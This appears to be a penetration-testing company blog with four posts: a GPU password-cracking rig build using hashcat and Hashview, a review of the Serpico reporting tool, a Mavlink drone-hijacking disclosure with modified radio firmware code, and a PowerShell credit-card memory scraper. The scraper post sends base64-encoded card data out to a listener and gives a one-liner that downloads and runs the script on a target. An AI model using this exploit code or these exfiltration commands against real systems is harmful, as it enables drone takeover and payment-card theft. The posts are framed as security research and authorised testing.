This build doesn't require any "black magic" or hours of frustration like desktop components do. If you follow this blog and its parts list, you'll have a working rig in 3 hours. These instructions should remove any anxiety of spending 5 figures and not knowing if you'll bang your head for days.

The Goal

Upgrade our current rig from 6 gtx 970s to 8 gtx 1080. Don't blow a fuse.

Parts list




Nowadays building mid-grade to high-end password crackers is like playing with legos, albeit expensive legos.

We did a time lapse of the build:

Build notes

There are few things we learned during the purchasing and assembly.

  1. You don't need to purchase a separate heatsink and fan for your CPUs. The Tyan chassis will come with them.
  2. Tyan chassis comes with brackets that screw into the back of you GPUs to secure them in place. These may not be needed if you never move the box, but it doesn't hurt to install them. We did.
  3. Rails are included with the Tyan.
  4. This chassis doesn't appear to have a onboard hardware raid. I just assumed it would 🙁
  5. BIOs didn't require any modifications or flashing. Came fully updated as of January 2017.
  6. We disabled the system speaker because it will scream at you if you don't have all three power supplies plugged in.

The memory slots are not labeled. Fill the banks similar to this image.

In the image below you can see the brackets that attach to the rear of the GPU for added support. Probably not needed but if you were to ship this rig I'd install them. This thing is HEAVY!

Software Install

We had no hardware issues but we installed one GPU, booted the system, and once we verified it could POST with no issues, we started installing the OS. Once Ubuntu finished installing, we later reinstalled all GPUs. Since things went so smoothly, next time I'd just fully install all GPUs and fire it up. Nothing to worry about.

Install Ubuntu 14.04.3 Server (x64)

Not going to cover this in detail. But here are few things we considered.

  1. Use LVM
  2. We chose not to encrypt whole disk or home directory. We generally make an encrypted volume later.
  3. Choose 'OpenSSH Server' from software selection screen (one less step post install)

Once OS is installed, verify GPUs are detected by OS:

lspci | grep VGA

Update and install dependencies for drivers and hashcat

sudo apt-get update && apt-get upgrade
sudo apt-get install gcc make p7zip-full git lsb-core

Download and install Nvidia drivers and Intel OpenCL runtime

Download Nvidia drivers. Nvidia 375.26 was current at the time of this build (January 2017).

UPDATE 4/10/2017 - If using 1080 Ti, use driver 378.13

chmod +x
sudo ./

If you get warning messages about x86 you can ignore them. Here's an example of one:

WARNING: Unable to find a suitable destination to install 32-bit compatibility libraries. Your system may not be set up for 32-bit compatibility. 32-bit compatibility files will not be installed; if you wish
to install them, re-run the installation and set a valid directory with the --compat32-libdir option

Install OpenCL runtime (not required but why not, use those CPUs too)

tar -xvf opencl_runtime_16.1.1_x64_ubuntu_6.4.0.25.tgz
cd opencl_runtime_16.1.1_x64_ubuntu_6.4.0.25

Install hashcat -

7z x hashcat-3.30.7z
cd hashcat-3.30

Test hashcat by running a 341 GH/s!!!!

[email protected]:~/hashcat-3.30$ ./hashcat64.bin -m 1000 -b
hashcat (v3.30) starting in benchmark mode...
OpenCL Platform #1: NVIDIA Corporation
* Device #1: GeForce GTX 1080, 2028/8113 MB allocatable, 20MCU
* Device #2: GeForce GTX 1080, 2028/8113 MB allocatable, 20MCU
* Device #3: GeForce GTX 1080, 2028/8113 MB allocatable, 20MCU
* Device #4: GeForce GTX 1080, 2028/8113 MB allocatable, 20MCU
* Device #5: GeForce GTX 1080, 2028/8113 MB allocatable, 20MCU
* Device #6: GeForce GTX 1080, 2028/8113 MB allocatable, 20MCU
* Device #7: GeForce GTX 1080, 2028/8113 MB allocatable, 20MCU
* Device #8: GeForce GTX 1080, 2028/8113 MB allocatable, 20MCU
Hashtype: NTLM
Speed.Dev.#1.....: 42896.1 MH/s (62.48ms)
Speed.Dev.#2.....: 42604.1 MH/s (62.97ms)
Speed.Dev.#3.....: 42799.0 MH/s (62.57ms)
Speed.Dev.#4.....: 42098.9 MH/s (63.68ms)
Speed.Dev.#5.....: 42871.5 MH/s (62.57ms)
Speed.Dev.#6.....: 42825.0 MH/s (62.64ms)
Speed.Dev.#7.....: 42848.9 MH/s (62.54ms)
Speed.Dev.#8.....: 42449.8 MH/s (63.16ms)
Speed.Dev.#*.....:   341.4 GH/s
Started: Mon Feb 13 17:54:12 2017
Stopped: Mon Feb 13 17:54:31 2017

Install hashview -

Install dependencies

sudo apt-get update
sudo apt-get install mysql-server libmysqlclient-dev redis-server openssl

Optimize the database

vim /etc/mysql/my.conf

Add the following line under the [mysqld] section:

innodb_flush_log_at_trx_commit  = 0

Restart mysql

service mysql restart

Install RVM - (commands below are from

gpg --keyserver hkp:// --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3
\curl -sSL | bash -s stable --ruby

Download and setup Hashview

git clone
cd hashview

Install gems (from Hashview directory)

rvm install ruby-2.2.2
gem install bundler
bundle install

Setup database connectivity

cp config/database.yml.example config/database.yml
vim config/database.yml

Create database

RACK_ENV=production rake db:setup

In another terminal or screen session, kick off resque

RACK_ENV=production TERM_CHILD=1 QUEUE=* rake resque:work

note: In production mode no output will be displayed until a job has started

Run Hashview

RACK_ENV=production ruby hashview.rb

Crack Hashes

Start a job and start cracking!

Then intensely watch analytics in realtime while sipping on your favorite cocktail

Stay tuned...

We just bought our second 8 GPU rig! In a future post we'll show you how to easily support distributed cracking using Hashview.


TL;DR: Reporting sucks, rarely does anyone enjoy it. Serpico is a tool that helps with reporting and makes it suck less through collaboration and automation, saving you time that you’d rather spend pentesting. Serpico is easy to install and works out of the box, yet highly customizable. Automating AND customizing your reports has never been more painless (I’ve tried lots of solutions). It might make you enjoy reporting…maybe 😉

A case study in pentest reporting using Serpico

I first learned of Serpico through a good friend (and project developer) Pete Arzamendi (bokojan). It was developed by pentesters faced with the same reporting challenges I often battled. Will Vandevanter (@_will_is) used his wickedly awesome knowledge on Office XML to develop Serpico, a powerful pentest reporting tool. He’s also the reason why I’m obsessed with Ruby and Sinatra.

So you might be wondering, haven’t I heard of Dradis or MagicTree? Yes, I’ve heard of them, and during every new release I’d install them and hope for it to ease our reporting pain, but they always feel short.

Our existing solution was a report template in Word with custom document properties as variables. We’d have another Word document containing all the findings that we’d crib from. Unfortunately, the existing reporting solutions increased our time because we were always having to heavily modify them or spend time dealing with software and report generation errors.

Existing challenges related to report automation:

  • Overly complex applications – I don’t want to spend hours managing a complex solution. More time should be spent on crafting a quality report, not managing the automation tool.
  • Time consuming to customize – Our team has a few unique ways of doing things and customization should be easy.
  • Reliability – Solutions never worked out of the box, and if you managed to get it working, it never remained working for long, or a user could easily break it.
  • Portability – Wouldn’t it be nice to have your reporting solution be centralized but flexible to run locally if needed?
  • Team collaboration – Multiple pentesters should be able to contribute to the report without stepping on each other’s toes.
  • Reports always needed a lot of tweaking after being generated – I don’t want to run macros if I can avoid it, or substitute document properties. This should all be handled by the reporting tool.
  • Simplicity in design – Other tools try to manage my data, do too much automation, or just don’t have fully working basic features (generating an error free Word document).
  • Managing templated findings – Over time you tweak your findings, find better ways to word them, add new resources, or create a new finding during an engagement. Adding these changes back to the master

Features of Serpico and how we benefit from them

Serpico was quick and easy to install. I went from install to a customized generated report within 30 minutes. Update: Recently an omnibus packaged installer was developed, making the install even faster! I added a finding to a test report and out popped a word docx with no errors, no funky formatting issues, exactly like I always wanted. Will has done some research with Office XML, giving him a good understanding of all the Microsoft nuances that make this task more difficult than you’d think.

Here is a brief list of features that I find useful as a penetration tester:

  • Templated findings – You create template findings and can reuse it in any report. When you add the finding to a report, it’s easy to customize that finding to tailor it the client. If you like the changes you made to the finding you even have the option to upload it back to the templates database with a push of a button. This drastically reduces repeated writing.
  • Custom meta language allows for programmatic generation of reports – For loops and if statements supported. This is helpful in generating tables of data and layouts by severity, category, etc.
  • Variables –Serpico also has the ability to create user defined variables so you’ll never be limited. These are managed from Serpico.
  • Written in ruby using Sinatra and Haml – This makes the project easy and fast to customize. Example: We wanted a dual approval approach to newly created findings. We added an additional field called “reviewed”. When a finding was peer reviewed for technicality by another pentester it would get marked as reviewed. When it was reviewed for grammar by our technical writer it was then marked as “approved” and the finding template would be available for everyone to use.
  • Screenshots - Upload your image, use the meta language to embed in your finding and that’s it!
  • Automatic vulnerability mapping – If you have a vulnerability that can be detected via a vulnerability scanner, Serpico can automatically add your custom written finding associated with the vulnerability from popular scanning tools. It does this by CVE, Nessus ID, Burp ID, etc.
  • Metasploit Integration – You can view hosts and vulnerabilities from any format that Metasploit supports. This feature is new and evolving.
  • Easy collaboration – There is an approval option to each finding, you can manage users and their access to reports, you can view historical edits of findings (like a wiki), and support for multiple report templates for different project types.
  • API and scripting – Serpico can be very powerful. There’s examples on how you can import vulnerabilities from VulnDB via scripting.

Centralized vs Distributed

Serpico supports both. Currently we use a centralized model. All users connect to one instance of Serpico to do reporting. However, on a couple occasions we were forced do an onsite pentest with no Internet access and without any sensitive data leaving the premise. One of us simply installed Serpico locally and using its import and export features, we were able to move all of our templated findings to our local instance very quickly.

Tips if you choose to use Serpico

  • Start by customizing the provided template.
  • When creating a customized report template, make one change at a time. If you make a mistake and foobar your template, it will be easier to find your error.
  • Stick to the approval process, straying away from that might mean you’ll have a bunch of newly (poorly written) templated findings that were hastily created by users.
  • DO NOT USE SERPICO TO AUTO GENERATE VULNERABILITY SCAN REPORTS. Serpico is all about quality reporting. Blindly converting a Nessus report finding by finding using this tool means you are contributing to low quality reports that we see in this industry. Tailor each report to your client’s needs.
  • Variables are not supported in headers and footers, remember that.
  • Provide developers with feedback to continue making it awesome.
  • Enjoy spending less time reporting!

I wrote this on the plane to Blackhat and Defcon 2016. The Serpico team asked me to to join them at Blackhat Arsenal and I’m happy to help! Stop by to see a working demo and say hi. Follow @SerpicoProject for future updates.


Recently some of us here at shellntel have been building quadcopters and autonomous vehicles for fun.  We are big fans of the Pixhawk flight controller for its awesome autonomous capabilities.  We are also big fans of privacy.  As much as we like to build and fly these drones, we realize doing so in an irresponsible way can cause concern. We started looking into the various drone communications and discovered a design flaw that allowed us to take control of any drone flying with a specific telemetry protocol.

Telemetry allows the drone to exchange information and commands wirelessly with a ground station. This includes sending/receiving GPS coordinates, waypoints, throttle adjustments, arm and disarm commands, pretty much anything, including a serial shell.

The design flaw is not unique to PixHawk, but rather with the Mavlink protocol. Mavlink is used by many companies including:  Parrot AR.Drone (with Flight Recorder), ArduPilot, PX4FMU, pxIMU, SmartAP, MatrixPilot, Armazila 10dM3UOP88, Hexo+, TauLabs and AutoQuad. All of these companies make great products, but if they adopt the Mavlink protocol as is, it may be possible to hijack their drones (and any other drone using Mavlink).

According to its documentation, each Mavlink radio pair is setup with a NetID or channel.  This is done to prevent two radio pairs from interfering with each other.  By default this value is set to 25, but the user can change this setting. To hijack one of these drones, all you'd need to do is set your transmitter to the same NetID as the target drone.

Looking at the protocol spec, each data packet sent by the radio includes the NetID in its transmission!  This means that all we need to do is listen for a single packet within the frequency spectrum, capture it, carve the NetID, and set our radio to use it.  This, is surprisingly easy.

Using these radios (we used v2), we can modify the OSS firmware to simply do this.  The following changes were made to  radio.c which when compiled is flashed to the transmitter.


Original Code:

    // decode the header
    errcount = golay_decode(6, buf, gout);
    if (gout[0] != netid[0] || gout[1] != netid[1]) {
        // its not for our network ID 
        debug("netid %x %x\n",
        goto failed;

Modified Code:

        // decode the header
        errcount = golay_decode(6, buf, gout);
        if (gout[0] != netid[0] || gout[1] != netid[1]) {
                // its not for our network ID 
                /* Modified by __int128 */
                // Set our radio to use the captured packets NetID
                param_set(PARAM_NETID, gout[0]);
                // Save the value to flash
                 // To read the new value we need to reboot.  Rebooting
                RSTSRC |= (1 << 4);
                /* End of what was added by __int128*/

The variable gout[0] is set earlier in the radio.c; which is populated with the NetID of all captured packets.  This block of code is only hit when our radio hears a packet from another radio set on a different NetID from ours (which is good because don’t want to reboot each time we hear a new packet).  Anyway, that’s it, 3 lines of code is all it takes to hijack any drone using Mavlink.  Compile it, flash the radio and you’re good to go.  It works surprisingly well and is super quick.  

During the post exploitation phase of a penetration test, I like to provide the client with examples of what could happen if a breach were to take place.  One of the most common examples of this is credit card theft. To demonstrate this threat, I created a PowerShell memory scraper against whatever application (many times browsers) the target is using to harvest track data. Why PowerShell? Because anti-virus doesn't prevent it and it provides me the ability to quickly modify the script, tailoring it for the application used within the organization.

Thanks to the awesomeness of @mattifestation and PowerSploit, you can use Out-Minidump to create a memory dump of a process.  I created a lightweight script with logic to continuously dump a process's memory and scrape it for track data. Using Internet Explorer as an example, the script performs the following:

You can download the script from Github (here):

git clone

Here is a screenshot of the memory scraper in action harvesting track data:

very old expired credit card...don't even know why I redacted it

I created few features that I find handy. One is the ability to encode and exfiltrate track data to a listener I have setup. It base64 encodes the track data and does a HTTP GET request with the data included. I never send this data across the Internet, only to an internal box of my control or over an encrypted tunnel. You can use any method to setup a listener but my favorite is:

python -m SimpleHTTPServer 80

The code supports harvesting plain card numbers if track data is not available, which I've used with success, but occasionally contains false positives. There is a Luhn check and some regexs to help reduce the false positives, but if that isn't enough, you can specify an IIN/BIN ( to match on.  Matching on IINs comes in handy when your client/target is in the financial industry.  Coworker @curi0usJack helped me squash bugs and implemented a duplicate checking feature so we're not sending and logging the same data over and over.

Many times my targeted users are utilizing a terminal server environment. This makes my life easy because I can run the memory scraper at a centralized location (the terminal servers), but since there are multiple users, you will want to limit the memory scraping to only processes used by your targeted users.  If not, you could be dumping memory from hundreds of processes that might not contain credit card data.  For this reason, I built a function that checks the process owner against the values of the -User parameter.  My common workflow is to identify my targeted users through group name in active directory, then specify them using the -User parameter and just let the memory scraper bake for a few days.

Everyone likes one-liners. If you want to run the memory scraper (example process is iexplore) run the following from the target system:

powershell.exe -exec bypass -Command "(New-Object Net.WebClient).DownloadFile('','mem_scraper.ps1');./mem_scraper.ps1 -Proc iexplore;"

I've found this method to be the quickest and most reliable. It only takes me minutes to narrow down my targets and deploy.  The script can be downloaded from Github and will work with PowerShell v2 and v3. I encourage you to give it a try on your next pentest (or within your organization with permission of course) and provide feedback.

Happy harvesting!


linkedin facebook pinterest youtube rss twitter instagram facebook-blank rss-blank linkedin-blank pinterest youtube twitter instagram